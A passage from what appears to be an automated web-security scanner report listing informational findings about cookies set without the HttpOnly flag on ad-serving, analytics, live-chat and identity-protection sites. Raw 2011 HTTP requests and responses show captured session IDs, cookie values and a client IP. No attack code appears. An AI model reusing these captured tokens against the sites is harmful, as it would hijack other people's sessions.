Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:36:57 GMT
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.2
X-Runtime: 0.00400
Content-Transfer-Encoding: binary
Cache-Control: private
Content-Disposition: attachment; filename="pixel.gif"
Set-Cookie: 1192=46276302; domain=vertster.com; path=/; expires=Wed, 25 Apr 2012 01:36:57 GMT
Set-Cookie: 46276302_campaignID=2630; domain=vertster.com; path=/; expires=Wed, 25 Apr 2012 01:36:57 GMT
Set-Cookie: v1192_recipeID=68334; domain=vertster.com; path=/; expires=Wed, 25 Apr 2012 01:36:57 GMT
Set-Cookie: v1192_domain=r.vertster.com; domain=vertster.com; path=/; expires=Wed, 25 Apr 2012 01:36:57 GMT
Content-Length: 13112
Status: 200 OK
P3P: CP="NON DSP COR NID CUR OUR NOR"
Content-Type: image/gif

GIF89a.............!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46.272976, Sat Jan 27 2007 22:11:41 "
...[SNIP]...

18.380. http://r1-ads.ace.advertising.com/site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; F1=BoQkz2kAAAAABq5CAEAAgEABAAAABAAAAIAAgEA; BASE=RgwqvyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nmI!; ROLL=boAnu2y6iNBg1C4LhynzuD54K75V4u/oBlRpVwKMMqbw4GP5fRga2X2wn3+EsmF!; C2=1V5sN5pqHIxFG7povgg3sY8QSKMCItdhvhQ3WX4bIMa4F+GCKGehvhQ3gZ4b1qKCaMrxDV7qIEysG+WkBgAoNXAcxOCCsRpBwB; GUID=MTMwMzYxNDgzNzsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 12:09:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894875.801362.0XMC
Set-Cookie: C2=MMBtN5pqHIxFGQoovgg3sYQKSKMCItdxUhQ3WXMVIMa4FTFCKGexUhQ3gZMV1qKCaMrBpU7qIEysGTVkBgAoNXUVmZOiGgasjgAbUaUVNSPC73cBwB; domain=advertising.com; expires=Tue, 23-Apr-2013 12:09:48 GMT; path=/
Set-Cookie: F1=BwwE02kAAAAABq5CAEAAEBABAAAABAAAAMAAEBA; domain=advertising.com; expires=Tue, 23-Apr-2013 12:09:48 GMT; path=/
Set-Cookie: BASE=RgwqoyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nm47UK47HID!; domain=advertising.com; expires=Tue, 23-Apr-2013 12:09:48 GMT; path=/
Set-Cookie: ROLL=boAnv2y2JFBgWE4zf7nzuD5wX65V4u/meZRpXwKuwebwa4PtYFhaQQG!; domain=advertising.com; expires=Tue, 23-Apr-2013 12:09:48 GMT; path=/
Set-Cookie: 53765754=_4db4130c,4224517685,801362^894875^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 24 Apr 2011 12:09:48 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 657

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735207/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000801362/mnum=0000894
...[SNIP]...

18.381. http://roia.biz/im/n/Pr6Nvq1BAAGKcUMAAAVwQgAArr9mMQA-A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://roia.biz
Path:   /im/n/Pr6Nvq1BAAGKcUMAAAVwQgAArr9mMQA-A

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /im/n/Pr6Nvq1BAAGKcUMAAAVwQgAArr9mMQA-A?cust=SUZE%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-09-59CD1 HTTP/1.1
Host: roia.biz
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roia1066=1BNctFRX773iepE2VRhbwPOSVgDrhBAAGKcXhpZGYgOTAzMjMwMDUzQ0QxAEQJKbMxVQAAhsNJrcHW800AAPyeczIxMwBDAAAFcEIAAKxFTwAABCo

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sun, 24 Apr 2011 03:10:01 GMT
Content-Type: text/plain
Connection: close
P3P: policyref="http://roia.biz/w3c/p3p.xml", CP="NOI DSP COR CURa OUR BUS NAV STA"
Set-Cookie: roia1066=1Bu97lXL1iQIPMiKI4F1LVeE8263ZBAAGKcXhTVVpFIGdpZDlhIGlkZW50aXR5IHRoZWZ0IHJlc291cmNlX29yZGVyaW5nMzQtLTIwMTEtMDQtMjMtLTIwLTA5LTU5Q0QxAEQJKbM4VQAAiOpJrcHW800AAPyeczIxMwBDAAAFcEIAAK6_TwAABCo; path=/im; expires=Mon, 23-Apr-2012 03:10:01 GMT
Pragma: no-cache
Cache-control: no-cache
Location: https://www.trustedid.com/suzeidprotector/?promoRefCode=NXDIRSUZIDPANN
Content-Length: 0
Expires: Sun, 24 Apr 2011 03:10:01 GMT


18.382. http://roia.biz/im/n/oW_Uvq1BAAGKcUMAAAVwQgAArEVmMQA-A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://roia.biz
Path:   /im/n/oW_Uvq1BAAGKcUMAAAVwQgAArEVmMQA-A

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /im/n/oW_Uvq1BAAGKcUMAAAVwQgAArEVmMQA-A?cust=idf%20903230053CD1 HTTP/1.1
Host: roia.biz
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sun, 24 Apr 2011 03:09:54 GMT
Content-Type: text/plain
Connection: close
P3P: policyref="http://roia.biz/w3c/p3p.xml", CP="NOI DSP COR CURa OUR BUS NAV STA"
Set-Cookie: roia1066=1BNctFRX773iepE2VRhbwPOSVgDrhBAAGKcXhpZGYgOTAzMjMwMDUzQ0QxAEQJKbMxVQAAhsNJrcHW800AAPyeczIxMwBDAAAFcEIAAKxFTwAABCo; path=/im; expires=Mon, 23-Apr-2012 03:09:54 GMT
Pragma: no-cache
Cache-control: no-cache
Location: https://www.trustedid.com/idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15
Content-Length: 0
Expires: Sun, 24 Apr 2011 03:09:54 GMT


18.383. http://s18.sitemeter.com/js/counter.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s18.sitemeter.com
Path:   /js/counter.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/counter.asp?site=s18neumedia HTTP/1.1
Host: s18.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 15:57:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7264
Content-Type: application/x-javascript
Expires: Sun, 24 Apr 2011 16:07:43 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...

18.384. http://s41.sitemeter.com/js/counter.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s41.sitemeter.com
Path:   /js/counter.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/counter.asp?site=s41TheDotNetFactory HTTP/1.1
Host: s41.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.identitymanagement.com/?_kk=identity%20management&_kt=d37d8c67-315a-4919-abfc-41011051bd9e&gclid=CJvKs4D1tagCFeJ95Qodoi78Dg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 19:45:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7280
Content-Type: application/x-javascript
Expires: Sun, 24 Apr 2011 19:55:27 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...

18.385. http://sales.liveperson.net/hc/31254474/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/31254474/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/31254474/?&site=31254474&cmd=mTagKnockPage&lpCallId=463903519557-382235814584&protV=20&lpjson=1&id=9714278555&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-truecredit-sales-english%7ClpMTagConfig.db1%7ClpButton%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.truecredit.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303647176210; ASPSESSIONIDCSBCSATT=NJCNHPGCKECNJHDJEKKBCIBC

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:53:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=30537039802780595; path=/hc/31254474
Set-Cookie: HumanClickACTIVE=1303692834275; expires=Tue, 26-Apr-2011 00:53:54 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 25 Apr 2011 00:53:54 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 27884

lpConnLib.Process({"ResultSet": {"lpCallId":"463903519557-382235814584","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

18.386. http://sales.liveperson.net/hc/31254474/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/31254474/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/31254474/?&site=31254474&cmd=mTagInPage&lpCallId=756832087179-375232440419&protV=20&lpjson=1&page=http%3A//www.truecredit.com/&id=9714278555&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-truecredit-sales-english&activePlugin=none&cobrowse=true&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.truecredit.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1818612326621797614; LivePersonID=-16601209214853-1303691674:-1:-1:-1:-1; HumanClickSiteContainerID_31254474=STANDALONE; LivePersonID=LP i=16601209214853,d=1303177644; ASPSESSIONIDCSBCSATT=NJCNHPGCKECNJHDJEKKBCIBC; HumanClickACTIVE=1303691672769

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:35:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_31254474=STANDALONE; path=/hc/31254474
Set-Cookie: LivePersonID=-16601209214853-1303691674:-1:1303691725:-1:-1; expires=Tue, 24-Apr-2012 00:35:25 GMT; path=/hc/31254474; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 25 Apr 2011 00:35:25 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 31351

lpConnLib.Process({"ResultSet": {"lpCallId":"756832087179-375232440419","lpCallConfirm":"","lpJS_Execute":[{"code_id": "chat-truecredit-sales-english-DTEXT", "js_code": "lpJSLib.inviteDTEXT = '<p><spa
...[SNIP]...

18.387. http://sales.liveperson.net/hc/71003277/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71003277/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/71003277/?&site=71003277&cmd=mTagStartPage&lpCallId=565276490757-576158150099&protV=20&lpjson=1&page=http%3A//www.hotelclub.com/ManageBooking.asp&id=1034388051&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-hotelclub-chat-en&activePlugin=none&cobrowse=true&PV%21unit=hotelclub-chat&PV%21visitorActive=1&SV%21language=en&title=View/Cancel%20Your%20Booking&referrer=http%3A//www.hotelclub.com/&cookie=HTC%3DAppVer%3D1%252E0%3B%20anon%3D1129876971252011042422094%3B%20ASPSESSIONIDCCQRQCTQ%3DFDCOCPBANKNGOIFKLDNNOFAM%3B%20s_vi%3D%5BCS%5Dv1%7C26DA09858516231B-400001A4A00530FD%5BCE%5D%3B%20WT_FPC%3Did%3D173.193.214.243-2165807168.30147192%3Alv%3D1303643486711%3Ass%3D1303643390479%3B%20s_cc%3Dtrue%3B%20s_lp%3Dno%3B%20s_sq%3D%255B%255BB%255D%255D HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/ManageBooking.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5427601522506632860; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303647088962

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:11:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_71003277=STANDALONE; path=/hc/71003277
Set-Cookie: LivePersonID=-16601209214853-1303647090:-1:-1:-1:-1; expires=Mon, 23-Apr-2012 12:11:31 GMT; path=/hc/71003277; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 24 Apr 2011 12:11:31 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"565276490757-576158150099","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

18.388. http://sales.liveperson.net/hc/71003277/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71003277/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/71003277/?&site=71003277&cmd=mTagKnockPage&lpCallId=609040248906-708747063996&protV=20&lpjson=1&id=2386500579&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-hotelclub-chat-en%7Cnull%7Chotelclub-chat-buttondiv%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/ManageBooking.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5427601522506632860; LivePersonID=-16601209214853-1303647090:-1:-1:-1:-1; HumanClickSiteContainerID_71003277=STANDALONE; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303647088962

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:13:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1303647201834; expires=Mon, 25-Apr-2011 12:13:21 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 24 Apr 2011 12:13:21 GMT
Set-Cookie: HumanClickSiteContainerID_71003277=STANDALONE; path=/hc/71003277
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 27397

lpConnLib.Process({"ResultSet": {"lpCallId":"609040248906-708747063996","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

18.389. http://sales.liveperson.net/hc/71003277/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71003277/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/71003277/?&site=71003277&cmd=mTagKnockPage&lpCallId=745409803464-13586354209&protV=20&lpjson=1&id=1034388051&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-hotelclub-chat-en%7Cnull%7Chotelclub-chat-buttondiv%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/ManageBooking.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:11:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=2881751932682469133; path=/hc/71003277
Set-Cookie: HumanClickACTIVE=1303647090025; expires=Mon, 25-Apr-2011 12:11:30 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 24 Apr 2011 12:11:30 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 27396

lpConnLib.Process({"ResultSet": {"lpCallId":"745409803464-13586354209","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.ne
...[SNIP]...

18.390. https://secure.identityguard.com/EnrollmentStep1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /EnrollmentStep1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /EnrollmentStep1?storeId=10051&MID=44929 HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: http://www.identityguard.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; JSESSIONID=0000q-nYx1Keu7bJfsO0pBizt3b:14glhsrp2

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:01:06 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002779999=100000002779999%2cJUzxOb61NxaLz%2bgbZ1Ro3ggcxR4%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_100000002779999=100000002779999%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvYV5lF81xxnGdIw%2bl67KlnwpiaV4dm5kxr6RupgpYiYzej4qMfr2800fXVLG6wog7P5%0aK21Gyauwu09mpmZhZ4vP36C00p317MJMJzNFxLjHfFcZX48t8T07DRFWuTmeY%2bqHjX9%2bVZQs5rb%2f%0aTds7a7PW; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 77221


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- Start of JSTLEnvironmentSetup.jspf -->



...[SNIP]...

18.391. https://secure.identityguard.com/EnrollmentStep1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /EnrollmentStep1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /EnrollmentStep1?storeId=10051&MID=44929 HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: http://www.identityguard.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; JSESSIONID=0000q-nYx1Keu7bJfsO0pBizt3b:14glhsrp2

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:11:05 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002780007=100000002780007%2c%2b4MSTzQJvaA8A8lIngB2TvNDsOs%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_100000002780007=100000002780007%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvYWpB2Z0TxZP72J2%2bhqWebpCtzwntQf6ifTPmCGzIYQdzgIAJGNdk1sqGsL2SFJbu2V%0auLDso7SoXCRHG3bmVho9SL71SKXWL3hyWVeizZEkFb0Qg%2ba8nNJxhZkTHBXdwRyvF8M5yw11RaqT%0aIMzKInFF; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 77221


